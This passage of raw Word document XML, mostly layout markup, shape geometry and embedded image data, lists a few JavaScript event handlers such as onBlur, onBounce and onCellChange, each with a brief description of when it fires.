      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>onbegin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>immediately</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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element's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>begins)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252"/>
          <w:tab w:val="left" w:pos="1253"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="1252" w:hanging="1063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756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471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1123" name="Group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166"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1124" name="Freeform 1126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348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742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" name="Text Box 112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onBlur()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4" o:spid="_x0000_s1308" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:37.1pt;height:9.15pt;z-index:-17638912;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166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">
                <v:shape id="Freeform 1126" o:spid="_x0000_s1309" style="position:absolute;left:1930;top:166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WYh8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2rDMBDdB3oHMYFuQiM5lNC6kU0plLrBEPI5wGBN&#10;bBNrZCzVcW9fFQLZzeN9Z5NPthMjDb51rCFZKhDElTMt1xpOx8+nFxA+IBvsHJOGX/KQZw+zDabG&#10;XXlP4yHUIoawT1FDE0KfSumrhiz6peuJI3d2g8UQ4VBLM+A1httOrpRaS4stx4YGe/poqLocfqyG&#10;r++y89MJC3vE12S7u6hyXCitH+fT+xuIQFO4i2/uwsT5yeoZ/r+JJ8j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WYh8MAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,348;21,348;18,348;0,327;0,324;0,187;21,166;720,166;741,187;741,327;723,348;720,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1125" o:spid="_x0000_s1310" type="#_x0000_t202" style="position:absolute;left:1930;top:166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R3cMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMII3TRUUrUaRRWFBWLZ2D3scm7EN&#10;NpNuk9X67zcLgrd5vM9Zbztbixu13jhWMBknIIgLpw2XCr7yw2gBwgdkjbVjUvAgD9tNv7fGVLs7&#10;Z3Q7hVLEEPYpKqhCaFIpfVGRRT92DXHkLq61GCJsS6lbvMdwW8tpksylRcOxocKG3ioqrqdfq2D3&#10;zdne/HycP7NLZvJ8mfBxflVqOOh2KxCBuvASP93vOs6fTGf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uR3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onBlur()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(in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>another</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>popup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>loaded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>looses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>focus)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420"/>
          <w:tab w:val="left" w:pos="1421"/>
        </w:tabs>
        <w:spacing w:line="333" w:lineRule="auto"/>
        <w:ind w:left="464" w:right="383" w:hanging="27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808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579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1120" name="Group 1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154"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1121" name="Freeform 1123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336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912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" name="Text Box 112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onBounce()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1" o:spid="_x0000_s1311" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:45.6pt;height:9.15pt;z-index:-17638400;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154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">
                <v:shape id="Freeform 1123" o:spid="_x0000_s1312" style="position:absolute;left:1930;top:154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FpQMIA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP24rCMBB9X/Afwgj7tqbtw7pWo4i4F0EQLx8wNGNT&#10;bCZtk9Xu3xtB2Lc5nOvMFr2txZU6XzlWkI4SEMSF0xWXCk7Hz7cPED4ga6wdk4I/8rCYD15mmGt3&#10;4z1dD6EUMYR9jgpMCE0upS8MWfQj1xBH7uw6iyHCrpS6w1sMt7XMkuRdWqw4NhhsaGWouBx+rYL2&#10;a1cRf6+ztvVufCy2xmwmvVKvw345BRGoD//ip/tHx/lplsLjm3iCn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MWlAwgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r22,21l912,161r-18,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,336;21,336;18,336;0,315;0,312;0,175;21,154;890,154;912,175;912,315;894,336;890,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1122" o:spid="_x0000_s1313" type="#_x0000_t202" style="position:absolute;left:1930;top:154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IJqcMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgje1tQeZLcaRURBEGRrPXgcm7EN&#10;NpPaRO3++83Cwt7m8T5nvuxtI57UeeNYwWScgCAunTZcKTgV2/cPED4ga2wck4Jv8rBcDN7mmGn3&#10;4pyex1CJGMI+QwV1CG0mpS9rsujHriWO3NV1FkOEXSV1h68YbhuZJslUWjQcG2psaV1TeTs+rILV&#10;mfONuR8uX/k1N0XxmfB+elNqNOxXMxCB+vAv/nPvdJw/SVP4/SaeIB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IJq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onBounce()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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when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6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>of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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>marquee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"alternate"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>and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6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>contents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>marquee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>reach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>one</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>side</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>window)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757"/>
          <w:tab w:val="left" w:pos="1758"/>
        </w:tabs>
        <w:spacing w:before="74"/>
        <w:ind w:left="1757" w:hanging="1568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859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50800</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="795020" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1117" name="Group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5020" cy="116205"/>
                          <a:chOff x="1930" y="80"/>
                          <a:chExt cx="1252" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1118" name="Freeform 1120"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="80"/>
                            <a:ext cx="1252" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3161 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1252"/>
                              <a:gd name="T2" fmla="+- 0 262 80"/>
                              <a:gd name="T3" fmla="*/ 262 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1252"/>
                              <a:gd name="T6" fmla="+- 0 262 80"/>
                              <a:gd name="T7" fmla="*/ 262 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1252"/>
                              <a:gd name="T10" fmla="+- 0 262 80"/>
                              <a:gd name="T11" fmla="*/ 262 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1252"/>
                              <a:gd name="T14" fmla="+- 0 241 80"/>
                              <a:gd name="T15" fmla="*/ 241 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1252"/>
                              <a:gd name="T18" fmla="+- 0 238 80"/>
                              <a:gd name="T19" fmla="*/ 238 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1252"/>
                              <a:gd name="T22" fmla="+- 0 101 80"/>
                              <a:gd name="T23" fmla="*/ 101 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1252"/>
                              <a:gd name="T26" fmla="+- 0 80 80"/>
                              <a:gd name="T27" fmla="*/ 80 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3161 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1252"/>
                              <a:gd name="T30" fmla="+- 0 80 80"/>
                              <a:gd name="T31" fmla="*/ 80 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3182 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1252"/>
                              <a:gd name="T34" fmla="+- 0 101 80"/>
                              <a:gd name="T35" fmla="*/ 101 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3182 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1252"/>
                              <a:gd name="T38" fmla="+- 0 241 80"/>
                              <a:gd name="T39" fmla="*/ 241 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3164 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1252"/>
                              <a:gd name="T42" fmla="+- 0 262 80"/>
                              <a:gd name="T43" fmla="*/ 262 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3161 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1252"/>
                              <a:gd name="T46" fmla="+- 0 262 80"/>
                              <a:gd name="T47" fmla="*/ 26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52" h="183">
                                <a:moveTo>
                                  <a:pt x="123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231" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1234" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123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Text Box 111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80"/>
                            <a:ext cx="1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onCellChange()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8" o:spid="_x0000_s1314" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:4pt;width:62.6pt;height:9.15pt;z-index:-17637888;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,80" coordsize="125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">
                <v:shape id="Freeform 1120" o:spid="_x0000_s1315" style="position:absolute;left:1930;top:80;width:1252;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="125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MNQMUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBDF7wW/wzKF3uomFkRSV7GCYE7FP7mP2TFJ&#10;zc7G7Fbjt3cOhd5meG/e+818ObhW3agPjWcD6TgBRVx623Bl4HjYvM9AhYhssfVMBh4UYLkYvcwx&#10;s/7OO7rtY6UkhEOGBuoYu0zrUNbkMIx9Ryza2fcOo6x9pW2Pdwl3rZ4kyVQ7bFgaauxoXVN52f86&#10;Ax/ToQgbe/4uTvn20Xy5PL3+5Ma8vQ6rT1CRhvhv/rveWsFPU8GVb2QEv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w1AxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m1231,182l21,182r-3,l,161r,-3l,21,21,,1231,r21,21l1252,161r-18,21l1231,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1231,262;21,262;18,262;0,241;0,238;0,101;21,80;1231,80;1252,101;1252,241;1234,262;1231,262" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1119" o:spid="_x0000_s1316" type="#_x0000_t202" style="position:absolute;left:1930;top:80;width:125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pRZcMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgje1rR7kLUaRcQFQVi21oPHsRnb&#10;YDOpTdTuv98sCN7m8T5nvuxtI+7UeeNYQTpOQBCXThuuFByKr/dPED4ga2wck4Jf8rBcDN7mmGn3&#10;4Jzu+1CJGMI+QwV1CG0mpS9rsujHriWO3Nl1FkOEXSV1h48Ybhv5kSQTadFwbKixpXVN5WV/swpW&#10;R8435vp9+snPuSmKacK7yUWp0bBfzUAE6sNL/HRvdZyfplP4/yae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pRZ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onCellChange()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(fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>changes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>provider)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420"/>
          <w:tab w:val="left" w:pos="1421"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="1420" w:hanging="1231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910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579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1114" name="Group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166"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1115" name="Freeform 1117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348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
